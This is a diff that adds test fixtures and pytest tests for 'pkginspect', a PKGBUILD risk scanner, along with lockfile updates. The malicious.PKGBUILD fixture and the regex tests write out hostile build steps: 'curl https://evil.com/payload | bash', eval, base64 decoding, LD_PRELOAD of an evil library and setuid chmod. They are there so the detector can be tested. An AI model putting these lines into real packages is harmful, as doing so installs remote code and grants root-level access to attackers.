+# Maintainer: John Doe <john@example.com>
+pkgname=clean-pkg
+pkgver=1.0
+pkgrel=1
+pkgdesc="A clean, well-maintained package"
+arch=(x86_64)
+url="https://example.com"
+license=(MIT)
+depends=(glibc)
+source=("https://example.com/clean-pkg-${pkgver}.tar.gz")
+sha512sums=('abcdef1234567890abcdef1234567890abcdef1234567890abcdef1234567890abcdef1234567890abcdef1234567890abcdef1234567890abcdef1234567890')
+
+build() {
+    make
+}
+
+package() {
+    make DESTDIR="$pkgdir" install
+}

--- a/tests/fixtures/malicious.PKGBUILD
+++ b/tests/fixtures/malicious.PKGBUILD
@@ -1,0 +1,20 @@
+pkgname=malicious-pkg
+pkgver=1.0
+pkgrel=1
+pkgdesc="A malicious package"
+arch=(x86_64)
+source=("https://example.com/malicious-pkg.tar.gz")
+sha256sums=('SKIP')
+
+build() {
+    curl https://evil.com/payload | bash
+    eval "$MALICIOUS_VAR"
+    bash -c "$(cat /tmp/script)"
+    base64 --decode /tmp/encoded > /tmp/decoded
+    LD_PRELOAD=/usr/lib/evil.so make
+    chmod u+s /usr/bin/evil
+}
+
+package() {
+    install -Dm755 "$srcdir/evil" "$pkgdir/usr/bin/evil"
+}

--- a/tests/fixtures/moderate.PKGBUILD
+++ b/tests/fixtures/moderate.PKGBUILD
@@ -1,0 +1,21 @@
+# Maintainer: Jane Smith <jane@example.com>
+pkgname=moderate-pkg
+pkgver=2.3
+pkgrel=1
+pkgdesc="A package with some issues"
+arch=(x86_64)
+url="https://example.com"
+license=(GPL2)
+source=("http://example.com/moderate-pkg-${pkgver}.tar.gz"
+        "git+https://github.com/example/repo")
+sha256sums=('abcdef1234567890abcdef1234567890abcdef1234567890abcdef1234567890'
+            'SKIP')
+
+build() {
+    ./configure
+    make
+}
+
+package() {
+    make DESTDIR="$pkgdir" install
+}

--- a/tests/test_rules.py
+++ b/tests/test_rules.py
@@ -1,0 +1,42 @@
+from __future__ import annotations
+
+from pkginspect.rules import RulesConfig, load_rules
+
+
+def test_load_bundled_rules():
+    config = load_rules()
+    assert isinstance(config, RulesConfig)
+    assert config.weights["missing_checksums"] < 0
+    assert config.caps["integrity"] < 0
+    assert config.blockers["uses_sudo"] is True
+
+
+def test_all_weight_keys_present():
+    config = load_rules()
+    expected = {
+        "missing_checksums",
+        "skip_checksum_some",
+        "skip_checksum_all",
+        "weak_hash",
+        "insecure_url",
+        "git_unpinned",
+        "pipe_to_shell",
+        "eval_exec",
+        "obfuscation",
+        "ld_preload",
+        "network_fetch",
+        "sudo_or_pacman",
+        "privilege_escal",
+        "setuid_bit",
+        "no_license",
+        "no_arch_field",
+        "no_maintainer_tag",
+        "namcap_error",
+        "aur_low_votes_1",
+        "aur_low_votes_2",
+        "aur_low_votes_3",
+        "aur_orphaned",
+        "aur_out_of_date",
+    }
+    missing = expected - set(config.weights.keys())
+    assert not missing, f"Missing weight keys: {missing}"

--- a/tests/test_scoring.py
+++ b/tests/test_scoring.py
@@ -1,0 +1,374 @@
+from __future__ import annotations
+
+import re
+
+import pytest
+
+from pkginspect.rules import load_rules
+from pkginspect.scoring import (
+    BASH_C_RE,
+    CURL_RE,
+    EVAL_RE,
+    LD_PRELOAD_RE,
+    OBFUSCATION_RE,
+    PACMAN_WRITE_RE,
+    PIPE_SHELL_RE,
+    SETCAP_RE,
+    SUDO_RE,
+    WRITE_CMD_RE,
+    extract_array,
+    extract_package_bodies,
+    score_pkgbuild,
+)
+
+
+# ── regex unit tests ─────────────────────────────────────────────
+
+
+class TestPipeShellRe:
+    def test_curl_pipe_sh(self):
+        assert PIPE_SHELL_RE.search("curl https://evil.com | sh")
+
+    def test_curl_pipe_bash(self):
+        assert PIPE_SHELL_RE.search("curl https://evil.com | bash")
+
+    def test_wget_pipe_sh(self):
+        assert PIPE_SHELL_RE.search("wget -qO- https://evil.com | sh")
+
+    def test_source_process_substitution(self):
+        assert PIPE_SHELL_RE.search("source <(curl https://evil.com)")
+
+    def test_no_match_curl_alone(self):
+        assert not PIPE_SHELL_RE.search("curl https://example.com -o file.tar.gz")
+
+    def test_no_match_wget_save(self):
+        assert not PIPE_SHELL_RE.search("wget https://example.com/file.tar.gz")
+
+
+class TestEvalRe:
+    def test_eval(self):
+        assert EVAL_RE.search("eval $VAR")
+
+    def test_exec(self):
+        assert EVAL_RE.search("exec /usr/bin/app")
+
+    def test_no_match_evaldir(self):
+        # 'evaldir' is not 'eval '
+        assert not EVAL_RE.search("evaldir=/tmp/build")
+
+
+class TestBashCRe:
+    def test_bash_c(self):
+        assert BASH_C_RE.search('bash -c "echo evil"')
+
+    def test_sh_c(self):
+        assert BASH_C_RE.search("sh -c 'malicious'")
+
+    def test_no_match_bash_alone(self):
+        assert not BASH_C_RE.search("bash script.sh")
+
+
+class TestObfuscationRe:
+    def test_base64_d(self):
+        assert OBFUSCATION_RE.search("base64 -d encoded.txt | sh")
+
+    def test_base64_decode(self):
+        assert OBFUSCATION_RE.search("base64 --decode payload.b64")
+
+    def test_xxd_r(self):
+        assert OBFUSCATION_RE.search("xxd -r hex.txt > binary")
+
+    def test_no_match_base64_encode(self):
+        assert not OBFUSCATION_RE.search("base64 file.bin > encoded.txt")
+
+
+class TestLdPreloadRe:
+    def test_ld_preload(self):
+        assert LD_PRELOAD_RE.search("LD_PRELOAD=/usr/lib/evil.so make")
+
+    def test_ld_library_path(self):
+        assert LD_PRELOAD_RE.search("LD_LIBRARY_PATH=/tmp/libs ./app")
+
+    def test_no_match_regular_make(self):
+        assert not LD_PRELOAD_RE.search("make CFLAGS='-O2'")
+
+
+class TestSetcapRe:
+    def test_setcap(self):
+        assert SETCAP_RE.search("setcap cap_net_raw+ep /usr/bin/ping")
+
+    def test_chmod_777(self):
+        assert SETCAP_RE.search("chmod 777 /usr/bin/app")
+
+    def test_chmod_setuid(self):
+        assert SETCAP_RE.search("chmod 4755 /usr/bin/app")
+
+    def test_chmod_u_plus_s(self):
+        assert SETCAP_RE.search("chmod u+s /usr/bin/app")
+
+    def test_no_match_chmod_755(self):
+        assert not SETCAP_RE.search("chmod 755 /usr/bin/app")
+
+
+class TestWriteCmdRe:
+    def test_install_to_etc(self):
+        assert WRITE_CMD_RE.search("install -Dm644 foo.conf /etc/foo/bar.conf")
+
+    def test_cp_to_usr(self):
+        assert WRITE_CMD_RE.search("cp mybin /usr/bin/mybin")
+
+    def test_sed_to_etc(self):
+        assert WRITE_CMD_RE.search("sed -i 's/old/new/' /etc/app/config")
+
+    def test_no_match_install_to_pkgdir(self):
+        assert not WRITE_CMD_RE.search('install -Dm755 app "$pkgdir/usr/bin/app"')
+
+
+class TestCheckRe:
+    def test_plain_sha256(self):
+        from pkginspect.scoring import CHECK_RE
+
+        assert CHECK_RE.match("sha256sums=")
+
+    def test_per_arch_sha256(self):
+        from pkginspect.scoring import CHECK_RE
+
+        assert CHECK_RE.match("sha256sums_x86_64=")
+
+    def test_per_arch_aarch64(self):
+        from pkginspect.scoring import CHECK_RE
+
+        assert CHECK_RE.match("sha256sums_aarch64=")
+
+    def test_per_arch_b2(self):
+        from pkginspect.scoring import CHECK_RE
+
+        assert CHECK_RE.match("b2sums_armv7h=")
+
+
+def test_per_arch_checksums_not_flagged(config):
+    """Packages using sha256sums_x86_64= etc. should not get 'No checksum array'."""
+    lines = [
+        "# Maintainer: Test <test@test.com>",
+        "pkgname=nordvpn-bin",
+        "pkgver=1.0",
+        "pkgrel=1",
+        "arch=(x86_64 aarch64)",
+        "license=(GPL3)",
+        "source_x86_64=('https://example.com/pkg_amd64.deb')",
+        "source_aarch64=('https://example.com/pkg_arm64.deb')",
+        "sha256sums_x86_64=('abc123')",
+        "sha256sums_aarch64=('def456')",
+        'package() { bsdtar -C "$pkgdir" -xf *.deb; }',
+    ]
+    result = score_pkgbuild(lines, config=config)
+    messages = [f.message for f in result.findings]
+    assert not any("No checksum array" in m for m in messages)
+
+
+class TestExtractArray:
+    def test_simple_source(self):
+        txt = 'source=("https://example.com/foo.tar.gz")'
+        result = extract_array("source", txt)
+        assert "https://example.com/foo.tar.gz" in result
+
+    def test_multiline_source(self):
+        txt = 'source=(\n  "https://a.com/a.tar.gz"\n  "https://b.com/b.tar.gz"\n)'
+        result = extract_array("source", txt)
+        assert "a.tar.gz" in result
+        assert "b.tar.gz" in result
+
+    def test_missing_array(self):
+        result = extract_array("source", "pkgname=foo\npkgver=1.0")
+        assert result == ""
+
+
+class TestExtractPackageBodies:
+    def test_single_package(self):
+        txt = 'package() {\n  install -Dm755 app "$pkgdir/usr/bin/app"\n}\n'
+        bodies = extract_package_bodies(txt)
+        assert len(bodies) == 1
+        assert "install" in bodies[0]
+
+    def test_split_packages(self):
+        txt = (
+            'package_foo() {\n  install foo "$pkgdir/foo"\n}\n'
+            'package_bar() {\n  install bar "$pkgdir/bar"\n}\n'
+        )
+        bodies = extract_package_bodies(txt)
+        assert len(bodies) == 2
+
+    def test_nested_braces(self):
+        txt = 'package() {\n  if [ -f file ]; then\n    { install file "$pkgdir/file"; }\n  fi\n}\n'
+        bodies = extract_package_bodies(txt)
+        assert len(bodies) == 1
+        assert "install" in bodies[0]
+
+
+# ── scoring integration tests ────────────────────────────────────
+
+
+@pytest.fixture
+def config():
+    return load_rules()
+
+
+def test_clean_scores_high(clean_lines, config):
+    result = score_pkgbuild(clean_lines, config=config)
+    assert result.score >= 95
+
+
+def test_malicious_scores_zero(malicious_lines, config):
+    result = score_pkgbuild(malicious_lines, config=config)
+    assert result.score == 0
+
+
+def test_malicious_detects_pipe_to_shell(malicious_lines, config):
+    result = score_pkgbuild(malicious_lines, config=config)
+    messages = [f.message for f in result.findings]
+    assert any("Pipe to shell" in m for m in messages)
+
+
+def test_malicious_detects_eval(malicious_lines, config):
+    result = score_pkgbuild(malicious_lines, config=config)
+    messages = [f.message for f in result.findings]
+    assert any("eval" in m for m in messages)
+
+
+def test_malicious_detects_obfuscation(malicious_lines, config):
+    result = score_pkgbuild(malicious_lines, config=config)
+    messages = [f.message for f in result.findings]
+    assert any("Base64" in m for m in messages)
+
+
+def test_moderate_score_range(moderate_lines, config):
+    result = score_pkgbuild(moderate_lines, config=config)
+    assert 40 <= result.score <= 85
+
+
+def test_moderate_detects_insecure_url(moderate_lines, config):
+    result = score_pkgbuild(moderate_lines, config=config)
+    messages = [f.message for f in result.findings]
+    assert any("Insecure URL" in m for m in messages)
+
+
+def test_moderate_detects_skip(moderate_lines, config):
+    result = score_pkgbuild(moderate_lines, config=config)
+    messages = [f.message for f in result.findings]
+    assert any("SKIP" in m for m in messages)
+
+
+def test_comment_stripping_no_false_positive(config):
+    """Commented-out suspicious code should not trigger penalties."""
+    lines = [
+        "# Maintainer: Test <test@test.com>",
+        "pkgname=foo",
+        "pkgver=1.0",
+        "pkgrel=1",
+        "arch=(x86_64)",
+        "license=(MIT)",
+        "source=('https://example.com/foo.tar.gz')",
+        "sha512sums=('abc123' * 128)",
+        "# curl https://evil.com | bash",
+        "# eval $PAYLOAD",
+        "build() { make; }",
+        'package() { make DESTDIR="$pkgdir" install; }',
+    ]
+    result = score_pkgbuild(lines, config=config)
+    messages = [f.message for f in result.findings]
+    assert not any("Pipe to shell" in m for m in messages)
+    assert not any("eval" in m for m in messages)
+
+
+def test_git_unpinned_only_in_source(config):
+    """git+https in a comment should not trigger unpinned warning."""
+    lines = [
+        "# Maintainer: Test <test@test.com>",
+        "# See also: git+https://github.com/example/repo",
+        "pkgname=foo",
+        "pkgver=1.0",
+        "pkgrel=1",
+        "arch=(x86_64)",
+        "license=(MIT)",
+        "source=('https://example.com/foo.tar.gz')",
+        "sha512sums=('abc')",
+        "build() { make; }",
+        'package() { make DESTDIR="$pkgdir" install; }',
+    ]
+    result = score_pkgbuild(lines, config=config)
+    messages = [f.message for f in result.findings]
+    assert not any("unpinned" in m.lower() for m in messages)
+
+
+def test_aur_meta_out_of_date(config):
+    import time
+
+    lines = [
+        "# Maintainer: Test <test@test.com>",
+        "pkgname=foo",
+        "pkgver=1.0",
+        "pkgrel=1",
+        "arch=(x86_64)",
+        "license=(MIT)",
+        "source=('https://example.com/foo.tar.gz')",
+        "sha512sums=('abc')",
+        "build() { make; }",
+        'package() { make DESTDIR="$pkgdir" install; }',
+    ]
+    meta = {
+        "NumVotes": 100,
+        "Maintainer": "someone",
+        "OutOfDate": int(time.time()) - 86400 * 10,
+    }
+    result = score_pkgbuild(lines, config=config, aur_meta=meta)
+    messages = [f.message for f in result.findings]
+    assert any("out of date" in m.lower() for m in messages)
+
+
+class TestPacmanWriteRe:
+    def test_pacman_install(self):
+        assert PACMAN_WRITE_RE.search("pacman -S extra/package")
+
+    def test_pacman_remove(self):
+        assert PACMAN_WRITE_RE.search("pacman -R some-package")
+
+    def test_pacman_upgrade(self):
+        assert PACMAN_WRITE_RE.search("pacman -U /tmp/package.pkg.tar.zst")
+
+    def test_no_match_pacman_query(self):
+        # -Q is read-only
+        assert not PACMAN_WRITE_RE.search("pacman -Q package")
+
+    def test_no_match_pacman_deptest(self):
+        # -T is the deptest flag used legitimately in PKGBUILDs (e.g., paru)
+        assert not PACMAN_WRITE_RE.search("pacman -T pacman-git > /dev/null")
+
+    def test_no_match_depends_field(self):
+        # 'pacman' as a dependency name should not match
+        assert not PACMAN_WRITE_RE.search("depends=('git' 'pacman' 'libalpm.so>=14')")
+
+
+def test_paru_like_pacman_query_not_flagged(config):
+    """pacman -T (deptest) is a legitimate read-only check — must not trigger blocker."""
+    lines = [
+        "# Maintainer: Test <test@test.com>",
+        "pkgname=paru",
+        "pkgver=1.0",
+        "pkgrel=1",
+        "arch=(x86_64)",
+        "license=(GPL3)",
+        "depends=('git' 'pacman')",
+        "source=('https://example.com/paru-1.0.tar.gz')",
+        "sha256sums=('abc123')",
+        "build() {",
+        "  if pacman -T pacman-git > /dev/null; then",
+        "    _features+=git,",
+        "  fi",
+        "  cargo build --release",
+        "}",
+        'package() { install -Dm755 target/release/paru "$pkgdir/usr/bin/paru"; }',
+    ]
+    result = score_pkgbuild(lines, config=config)
+    assert result.score > 0, "pacman -T should not trigger the blocker"
+    messages = [f.message for f in result.findings]
+    assert not any("pacman" in m.lower() for m in messages)

--- a/uv.lock
+++ b/uv.lock
@@ -2,7 +2,8 @@ version = 1
 revision = 2
 requires-python = ">=3.8"
 resolution-markers = [
-    "python_full_version >= '3.9'",
+    "python_full_version >= '3.10'",
+    "python_full_version == '3.9.*'",
     "python_full_version < '3.9'",
 ]
 
@@ -112,12 +113,34 @@ wheels = [
 ]
 
 [[package]]
+name = "colorama"
+version = "0.4.6"
+source = { registry = "https://pypi.org/simple" }
+sdist = { url = "https://files.pythonhosted.org/packages/d8/53/6f443c9a4a8358a93a6792e2acffb9d9d5cb0a5cfd8802644b7b1c9a02e4/colorama-0.4.6.tar.gz", hash = "sha256:08695f5cb7ed6e0531a20572697297273c47b8cae5a63ffc6d6ed5c201be6e44", size = 27697, upload-time = "2022-10-25T02:36:22.414Z" }
+wheels = [
+    { url = "https://files.pythonhosted.org/packages/d1/d6/3965ed04c63042e047cb6a3e6ed1a63a35087b6a609aa3a15ed8ac56c221/colorama-0.4.6-py2.py3-none-any.whl", hash = "sha256:4f1d9991f5acc0ca119f9d443620b77f9d6b33703e51011c16baf57afb285fc6", size = 25335, upload-time = "2022-10-25T02:36:20.889Z" },
+]
+
+[[package]]
 name = "distlib"
 version = "0.3.9"
 source = { registry = "https://pypi.org/simple" }
 sdist = { url = "https://files.pythonhosted.org/packages/0d/dd/1bec4c5ddb504ca60fc29472f3d27e8d4da1257a854e1d96742f15c1d02d/distlib-0.3.9.tar.gz", hash = "sha256:a60f20dea646b8a33f3e7772f74dc0b2d0772d2837ee1342a00645c81edf9403", size = 613923, upload-time = "2024-10-09T18:35:47.551Z" }
 wheels = [
     { url = "https://files.pythonhosted.org/packages/91/a1/cf2472db20f7ce4a6be1253a81cfdf85ad9c7885ffbed7047fb72c24cf87/distlib-0.3.9-py2.py3-none-any.whl", hash = "sha256:47f8c22fd27c27e25a65601af709b38e4f0a45ea4fc2e710f65755fa8caaaf87", size = 468973, upload-time = "2024-10-09T18:35:44.272Z" },
+]
+
+[[package]]
+name = "exceptiongroup"
+version = "1.3.1"
+source = { registry = "https://pypi.org/simple" }
+dependencies = [
+    { name = "typing-extensions", version = "4.13.2", source = { registry = "https://pypi.org/simple" }, marker = "python_full_version < '3.9'" },
+    { name = "typing-extensions", version = "4.14.1", source = { registry = "https://pypi.org/simple" }, marker = "python_full_version >= '3.9' and python_full_version < '3.13'" },
+]
+sdist = { url = "https://files.pythonhosted.org/packages/50/79/66800aadf48771f6b62f7eb014e352e5d06856655206165d775e675a02c9/exceptiongroup-1.3.1.tar.gz", hash = "sha256:8b412432c6055b0b7d14c310000ae93352ed6754f70fa8f7c34141f91c4e3219", size = 30371, upload-time = "2025-11-21T23:01:54.787Z" }
+wheels = [
+    { url = "https://files.pythonhosted.org/packages/8a/0e/97c33bf5009bdbac74fd2beace167cab3f978feb69cc36f1ef79360d6c4e/exceptiongroup-1.3.1-py3-none-any.whl", hash = "sha256:a7a39a3bd276781e98394987d3a5701d0c4edffb633bb7a5144577f82c773598", size = 16740, upload-time = "2025-11-21T23:01:53.443Z" },
 ]
 
 [[package]]
@@ -137,7 +160,8 @@ name = "filelock"
 version = "3.18.0"
 source = { registry = "https://pypi.org/simple" }
 resolution-markers = [
-    "python_full_version >= '3.9'",
+    "python_full_version >= '3.10'",
+    "python_full_version == '3.9.*'",
 ]
 sdist = { url = "https://files.pythonhosted.org/packages/0a/10/c23352565a6544bdc5353e0b15fc1c563352101f30e24bf500207a54df9a/filelock-3.18.0.tar.gz", hash = "sha256:adbc88eabb99d2fec8c9c1b229b171f18afa655400173ddc653d5d01501fb9f2", size = 18075, upload-time = "2025-03-14T07:11:40.47Z" }
 wheels = [
@@ -161,7 +185,8 @@ name = "identify"
 version = "2.6.12"
 source = { registry = "https://pypi.org/simple" }
 resolution-markers = [
-    "python_full_version >= '3.9'",
+    "python_full_version >= '3.10'",
+    "python_full_version == '3.9.*'",
 ]
 sdist = { url = "https://files.pythonhosted.org/packages/a2/88/d193a27416618628a5eea64e3223acd800b40749a96ffb322a9b55a49ed1/identify-2.6.12.tar.gz", hash = "sha256:d8de45749f1efb108badef65ee8386f0f7bb19a7f26185f74de6367bffbaf0e6", size = 99254, upload-time = "2025-05-23T20:37:53.3Z" }
 wheels = [
@@ -175,6 +200,31 @@ source = { registry = "https://pypi.org/simple" }
 sdist = { url = "https://files.pythonhosted.org/packages/f1/70/7703c29685631f5a7590aa73f1f1d3fa9a380e654b86af429e0934a32f7d/idna-3.10.tar.gz", hash = "sha256:12f65c9b470abda6dc35cf8e63cc574b1c52b11df2c86030af0ac09b01b13ea9", size = 190490, upload-time = "2024-09-15T18:07:39.745Z" }
 wheels = [
     { url = "https://files.pythonhosted.org/packages/76/c6/c88e154df9c4e1a2a66ccf0005a88dfb2650c1dffb6f5ce603dfbd452ce3/idna-3.10-py3-none-any.whl", hash = "sha256:946d195a0d259cbba61165e88e65941f16e9b36ea6ddb97f00452bae8b1287d3", size = 70442, upload-time = "2024-09-15T18:07:37.964Z" },
+]
+
+[[package]]
+name = "iniconfig"
+version = "2.1.0"
+source = { registry = "https://pypi.org/simple" }
+resolution-markers = [
+    "python_full_version == '3.9.*'",
+    "python_full_version < '3.9'",
+]
+sdist = { url = "https://files.pythonhosted.org/packages/f2/97/ebf4da567aa6827c909642694d71c9fcf53e5b504f2d96afea02718862f3/iniconfig-2.1.0.tar.gz", hash = "sha256:3abbd2e30b36733fee78f9c7f7308f2d0050e88f0087fd25c2645f63c773e1c7", size = 4793, upload-time = "2025-03-19T20:09:59.721Z" }
+wheels = [
+    { url = "https://files.pythonhosted.org/packages/2c/e1/e6716421ea10d38022b952c159d5161ca1193197fb744506875fbb87ea7b/iniconfig-2.1.0-py3-none-any.whl", hash = "sha256:9deba5723312380e77435581c6bf4935c94cbfab9b1ed33ef8d238ea168eb760", size = 6050, upload-time = "2025-03-19T20:10:01.071Z" },
+]
+
+[[package]]
+name = "iniconfig"
+version = "2.3.0"
+source = { registry = "https://pypi.org/simple" }
+resolution-markers = [
+    "python_full_version >= '3.10'",
+]
+sdist = { url = "https://files.pythonhosted.org/packages/72/34/14ca021ce8e5dfedc35312d08ba8bf51fdd999c576889fc2c24cb97f4f10/iniconfig-2.3.0.tar.gz", hash = "sha256:c76315c77db068650d49c5b56314774a7804df16fee4402c1f19d6d15d8c4730", size = 20503, upload-time = "2025-10-18T21:55:43.219Z" }
+wheels = [
+    { url = "https://files.pythonhosted.org/packages/cb/b1/3846dd7f199d53cb17f49cba7e651e9ce294d8497c8c150530ed11865bb8/iniconfig-2.3.0-py3-none-any.whl", hash = "sha256:f631c04d2c48c52b84d0d0549c99ff3859c98df65b3101406327ecc7d53fbf12", size = 7484, upload-time = "2025-10-18T21:55:41.639Z" },
 ]
 
 [[package]]
@@ -240,7 +290,8 @@ name = "mypy"
 version = "1.17.0"
 source = { registry = "https://pypi.org/simple" }
 resolution-markers = [
-    "python_full_version >= '3.9'",
+    "python_full_version >= '3.10'",
+    "python_full_version == '3.9.*'",
 ]
 dependencies = [
     { name = "mypy-extensions", marker = "python_full_version >= '3.9'" },
@@ -400,7 +451,8 @@ name = "orjson"
 version = "3.11.0"
 source = { registry = "https://pypi.org/simple" }
 resolution-markers = [
-    "python_full_version >= '3.9'",
+    "python_full_version >= '3.10'",
+    "python_full_version == '3.9.*'",
 ]
 sdist = { url = "https://files.pythonhosted.org/packages/29/87/03ababa86d984952304ac8ce9fbd3a317afb4a225b9a81f9b606ac60c873/orjson-3.11.0.tar.gz", hash = "sha256:2e4c129da624f291bcc607016a99e7f04a353f6874f3bd8d9b47b88597d5f700", size = 5318246, upload-time = "2025-07-15T16:08:29.194Z" }
 wheels = [
@@ -478,6 +530,15 @@ wheels = [
 ]
 
 [[package]]
+name = "packaging"
+version = "26.0"
+source = { registry = "https://pypi.org/simple" }
+sdist = { url = "https://files.pythonhosted.org/packages/65/ee/299d360cdc32edc7d2cf530f3accf79c4fca01e96ffc950d8a52213bd8e4/packaging-26.0.tar.gz", hash = "sha256:00243ae351a257117b6a241061796684b084ed1c516a08c48a3f7e147a9d80b4", size = 143416, upload-time = "2026-01-21T20:50:39.064Z" }
+wheels = [
+    { url = "https://files.pythonhosted.org/packages/b7/b9/c538f279a4e237a006a2c98387d081e9eb060d203d8ed34467cc0f0b9b53/packaging-26.0-py3-none-any.whl", hash = "sha256:b36f1fef9334a5588b4166f8bcd26a14e521f2b55e6b9de3aaa80d3ff7a37529", size = 74366, upload-time = "2026-01-21T20:50:37.788Z" },
+]
+
+[[package]]
 name = "pathspec"
 version = "0.12.1"
 source = { registry = "https://pypi.org/simple" }
@@ -496,6 +557,11 @@ dependencies = [
 ]
 
 [package.dev-dependencies]
+dev = [
+    { name = "pytest", version = "8.3.5", source = { registry = "https://pypi.org/simple" }, marker = "python_full_version < '3.9'" },
+    { name = "pytest", version = "8.4.2", source = { registry = "https://pypi.org/simple" }, marker = "python_full_version == '3.9.*'" },
+    { name = "pytest", version = "9.0.2", source = { registry = "https://pypi.org/simple" }, marker = "python_full_version >= '3.10'" },
+]
 lint = [
     { name = "pre-commit", version = "3.5.0", source = { registry = "https://pypi.org/simple" }, marker = "python_full_version < '3.9'" },
     { name = "pre-commit", version = "4.2.0", source = { registry = "https://pypi.org/simple" }, marker = "python_full_version >= '3.9'" },
@@ -516,6 +582,7 @@ requires-dist = [
 ]
 
 [package.metadata.requires-dev]
+dev = [{ name = "pytest", specifier = ">=7.0" }]
 lint = [{ name = "pre-commit", specifier = ">=3.5.0" }]
 type = [
     { name = "mypy", extras = ["faster-cache"], specifier = ">=1.14.1" },
@@ -540,11 +607,37 @@ name = "platformdirs"
 version = "4.3.8"
 source = { registry = "https://pypi.org/simple" }
 resolution-markers = [
-    "python_full_version >= '3.9'",
+    "python_full_version >= '3.10'",
+    "python_full_version == '3.9.*'",
 ]
 sdist = { url = "https://files.pythonhosted.org/packages/fe/8b/3c73abc9c759ecd3f1f7ceff6685840859e8070c4d947c93fae71f6a0bf2/platformdirs-4.3.8.tar.gz", hash = "sha256:3d512d96e16bcb959a814c9f348431070822a6496326a4be0911c40b5a74c2bc", size = 21362, upload-time = "2025-05-07T22:47:42.121Z" }
 wheels = [
     { url = "https://files.pythonhosted.org/packages/fe/39/979e8e21520d4e47a0bbe349e2713c0aac6f3d853d0e5b34d76206c439aa/platformdirs-4.3.8-py3-none-any.whl", hash = "sha256:ff7059bb7eb1179e2685604f4aaf157cfd9535242bd23742eadc3c13542139b4", size = 18567, upload-time = "2025-05-07T22:47:40.376Z" },
+]
+
+[[package]]
+name = "pluggy"
+version = "1.5.0"
+source = { registry = "https://pypi.org/simple" }
+resolution-markers = [
+    "python_full_version < '3.9'",
+]
+sdist = { url = "https://files.pythonhosted.org/packages/96/2d/02d4312c973c6050a18b314a5ad0b3210edb65a906f868e31c111dede4a6/pluggy-1.5.0.tar.gz", hash = "sha256:2cffa88e94fdc978c4c574f15f9e59b7f4201d439195c3715ca9e2486f1d0cf1", size = 67955, upload-time = "2024-04-20T21:34:42.531Z" }
+wheels = [
+    { url = "https://files.pythonhosted.org/packages/88/5f/e351af9a41f866ac3f1fac4ca0613908d9a41741cfcf2228f4ad853b697d/pluggy-1.5.0-py3-none-any.whl", hash = "sha256:44e1ad92c8ca002de6377e165f3e0f1be63266ab4d554740532335b9d75ea669", size = 20556, upload-time = "2024-04-20T21:34:40.434Z" },
+]
+
+[[package]]
+name = "pluggy"
+version = "1.6.0"
+source = { registry = "https://pypi.org/simple" }
+resolution-markers = [
+    "python_full_version >= '3.10'",
+    "python_full_version == '3.9.*'",
+]
+sdist = { url = "https://files.pythonhosted.org/packages/f9/e2/3e91f31a7d2b083fe6ef3fa267035b518369d9511ffab804f839851d2779/pluggy-1.6.0.tar.gz", hash = "sha256:7dcc130b76258d33b90f61b658791dede3486c3e6bfb003ee5c9bfb396dd22f3", size = 69412, upload-time = "2025-05-15T12:30:07.975Z" }
+wheels = [
+    { url = "https://files.pythonhosted.org/packages/54/20/4d324d65cc6d9205fabedc306948156824eb9f0ee1633355a8f7ec5c66bf/pluggy-1.6.0-py3-none-any.whl", hash = "sha256:e920276dd6813095e9377c0bc5566d94c932c33b27a3e3945d8389c374dd4746", size = 20538, upload-time = "2025-05-15T12:30:06.134Z" },
 ]
 
 [[package]]
@@ -571,7 +664,8 @@ name = "pre-commit"
 version = "4.2.0"
 source = { registry = "https://pypi.org/simple" }
 resolution-markers = [
-    "python_full_version >= '3.9'",
+    "python_full_version >= '3.10'",
+    "python_full_version == '3.9.*'",
 ]
 dependencies = [
     { name = "cfgv", marker = "python_full_version >= '3.9'" },
@@ -583,6 +677,77 @@ dependencies = [
 sdist = { url = "https://files.pythonhosted.org/packages/08/39/679ca9b26c7bb2999ff122d50faa301e49af82ca9c066ec061cfbc0c6784/pre_commit-4.2.0.tar.gz", hash = "sha256:601283b9757afd87d40c4c4a9b2b5de9637a8ea02eaff7adc2d0fb4e04841146", size = 193424, upload-time = "2025-03-18T21:35:20.987Z" }
 wheels = [
     { url = "https://files.pythonhosted.org/packages/88/74/a88bf1b1efeae488a0c0b7bdf71429c313722d1fc0f377537fbe554e6180/pre_commit-4.2.0-py2.py3-none-any.whl", hash = "sha256:a009ca7205f1eb497d10b845e52c838a98b6cdd2102a6c8e4540e94ee75c58bd", size = 220707, upload-time = "2025-03-18T21:35:19.343Z" },
+]
+
+[[package]]
+name = "pygments"
+version = "2.19.2"
+source = { registry = "https://pypi.org/simple" }
+sdist = { url = "https://files.pythonhosted.org/packages/b0/77/a5b8c569bf593b0140bde72ea885a803b82086995367bf2037de0159d924/pygments-2.19.2.tar.gz", hash = "sha256:636cb2477cec7f8952536970bc533bc43743542f70392ae026374600add5b887", size = 4968631, upload-time = "2025-06-21T13:39:12.283Z" }
+wheels = [
+    { url = "https://files.pythonhosted.org/packages/c7/21/705964c7812476f378728bdf590ca4b771ec72385c533964653c68e86bdc/pygments-2.19.2-py3-none-any.whl", hash = "sha256:86540386c03d588bb81d44bc3928634ff26449851e99741617ecb9037ee5ec0b", size = 1225217, upload-time = "2025-06-21T13:39:07.939Z" },
+]
+
+[[package]]
+name = "pytest"
+version = "8.3.5"
+source = { registry = "https://pypi.org/simple" }
+resolution-markers = [
+    "python_full_version < '3.9'",
+]
+dependencies = [
+    { name = "colorama", marker = "python_full_version < '3.9' and sys_platform == 'win32'" },
+    { name = "exceptiongroup", marker = "python_full_version < '3.9'" },
+    { name = "iniconfig", version = "2.1.0", source = { registry = "https://pypi.org/simple" }, marker = "python_full_version < '3.9'" },
+    { name = "packaging", marker = "python_full_version < '3.9'" },
+    { name = "pluggy", version = "1.5.0", source = { registry = "https://pypi.org/simple" }, marker = "python_full_version < '3.9'" },
+    { name = "tomli", marker = "python_full_version < '3.9'" },
+]
+sdist = { url = "https://files.pythonhosted.org/packages/ae/3c/c9d525a414d506893f0cd8a8d0de7706446213181570cdbd766691164e40/pytest-8.3.5.tar.gz", hash = "sha256:f4efe70cc14e511565ac476b57c279e12a855b11f48f212af1080ef2263d3845", size = 1450891, upload-time = "2025-03-02T12:54:54.503Z" }
+wheels = [
+    { url = "https://files.pythonhosted.org/packages/30/3d/64ad57c803f1fa1e963a7946b6e0fea4a70df53c1a7fed304586539c2bac/pytest-8.3.5-py3-none-any.whl", hash = "sha256:c69214aa47deac29fad6c2a4f590b9c4a9fdb16a403176fe154b79c0b4d4d820", size = 343634, upload-time = "2025-03-02T12:54:52.069Z" },
+]
+
+[[package]]
+name = "pytest"
+version = "8.4.2"
+source = { registry = "https://pypi.org/simple" }
+resolution-markers = [
+    "python_full_version == '3.9.*'",
+]
+dependencies = [
